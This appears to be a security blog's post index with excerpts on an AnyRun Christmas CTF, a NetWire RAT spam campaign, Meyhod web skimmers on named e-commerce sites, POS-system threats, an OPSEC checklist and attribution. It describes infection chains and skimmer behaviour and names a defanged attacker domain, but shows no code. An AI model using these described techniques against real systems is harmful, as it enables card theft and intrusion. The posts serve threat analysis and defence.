Posts

AnyRun Christmas CTF

Image
  Keen-eyed Tweeps may have noticed that AnyRun tweeted out a Christmas CTF in their Xmas post card this year (see above). I enjoy a good CTF and with some help from @KrabsOnSecurity we uncovered a code for a free trial of AnyRun Explorer (an account option which is not on the pricing package).  The CTF started with the above tweet, which contains a QR code. Once scanned a message appears: Using the built-in QR code scanner on my iPhone the code, the message appeared. I then chucked this into base64decode as I have inspected enough malicious code to realise when it is encoded this way: I got stuck here as the decoded output does not look like any encoded/encryption I have seen before. Luckily, @KrabsOnSecurity noticed this is an ID for an AnyRun sample run: This revealed a glowing Christmas tree produced by a PowerShell script that, when downloaded, contained the code for the CTF: And voila! We earned ourselves a nice trial of AnyRun explorer after a short CTF on Twitter: References: h

Analysis of the NetWire RAT campaign

Image
  Executive summary: Threat actors continue to leverage the NetWire Remote Access Trojan (RAT) in malicious spam email attacks using low-detection scripts, URL shorteners, and the Discord content delivery network (CDN).  The Infection chain begins with a targeted email from the t-online[.]de mail service. These contain an XLS file or ZIP archive that, if opened, triggers embedded VBScript and PowerShell scripts. The secondary stage leverages  URL shorteners in the PowerShell script that pull down a batch file from the attacker’s server or from the Discord CDN. If successfully executed the victim’s device is infected with NetWire RAT and a connection is made to the command and control (C&C) server. Post-exploitative activities can then be initiated from here. NetWire RAT is a widely used off-the-shelf malware used by cybercriminals groups and Business Email Compromise (BEC) scammers. This includes features such as stealing credentials, recording audio, screen capture, and keystroke

Operational Security Tips and Tricks

Image
For my last blog of 2020, I wanted to share a short checklist for users and researchers to keep themselves secure on the internet. Many attackers cast a wide net and many of those that fail the basics get caught. Hopefully this guide will help those on the path to Operational Security (OPSEC): Social Media: Set social media accounts (e.g. Twitter, Facebook, Instagram, Tiktok) to private. Avoid using your real name when creating accounts. Avoid using identifiable personal pictures for profile pictures and cover pictures. Leave bio details blank and avoid sharing identifiable information. Do not check-in to locations or share your location for social media posts. Have a vetted list of friends/contacts that you permit to view your social media content.  Finally, personnel who work in cleared positions may often ask family members not to share pictures of you and prevent tagging.  Personal Security (PERSEC): Use more than one email account - ideally one for critical services like finances,

Analysis of Meyhod JavaScript Web Skimmers

Image
  A new web skimmer, dubbed Meyhod, has been disclosed by RiskIQ. The malware (named after a typo in the code) appeared in October on several e-commerce sites, including the hair treatment company Bosley and the Chicago Architecture Center (CAC). While investigating the attacker's domain (jquerycloud[.]com) a bit further and other potential victims from this campaign were uncovered some months ago. This includes Doves Farm UK, The Fruit Company, Customer Earth Promos, and - due to the file names - potentially iCanvas or TFC: Active compromise of dovesfarm.co.uk: Skimmer 1: Identifier - sClass="yeikyd" - 'dovesfarm.js' (available here ) Skimmer 2: Identifier - sClass="frydbt" - 'icanvas.js' (available here ) Skimmer 3: Identifier - sClass="bfiyad" - 'tfc.js' (available here ) Skimmer 1 - Listener: Skimmer 2 and 3 - Listener: Skimmed Data: RC4 encryption: Data collected: Credit Card Number, Card Holder Name, CVV, expiry day, mont

The Game of Attribution

Image
  In 1937, one of the world’s most authoritative art historians, Abraham Bredius, was approached by a lawyer on behalf of a Dutch family estate to inspect a painting of a Christ and the Disciples at Emmaus (pictured above). Bredius dedicated many years of his life studying the artwork of Johannes Vermeer. After inspecting the painting, he wrote that it is not only a Vermeer, but one the greatest pieces Vermeer ever created. Han Van Meegeren, a mediocre Dutch artist, had in fact forged the work of Vermeer. The above piece was sold during WWII to Nazi Field-Mashal Hermann Goering. Van Meegeren was charged as a Nazi collaborator, but claimed he was national hero. This was because he traded the forgery for 200 original Dutch paintings seized by Goering at the beginning of the war.  To fool Abraham Bredius, the 83 year old art historian whose words were taken as gospel, Van Meegeren had to lay as many clues (or false flags) as he could. This involved making a new painting look like it was o

Analysis of the threats targeting Point of Sale systems

Image
  Background A point of sale (POS) system refers to the critical piece of software used by customers to execute a payment for goods or a service. This also includes the physical devices in stores, where POS terminals and systems are used to process card payments. These are often the primary targets of financially motivated organised cybercrime groups (also known as eCrime advanced persistent threats). Successful intrusion of a POS system can lead to the theft of vast amounts of financial data from customers. This can be used for immediate gain or sold on underground markets for fraud. A combination of hard-to-detect data-exfiltration malware; legacy hardware - which is difficult to patch; and general OS vulnerabilities, mean that this particular threat is common and can be difficult to defend against. Organised Cybercrime APT groups such as FIN6, FIN7, and FIN8 are currently some of the most significant threats to large retailers, restaurant chains, hotels, the leisure industry, and to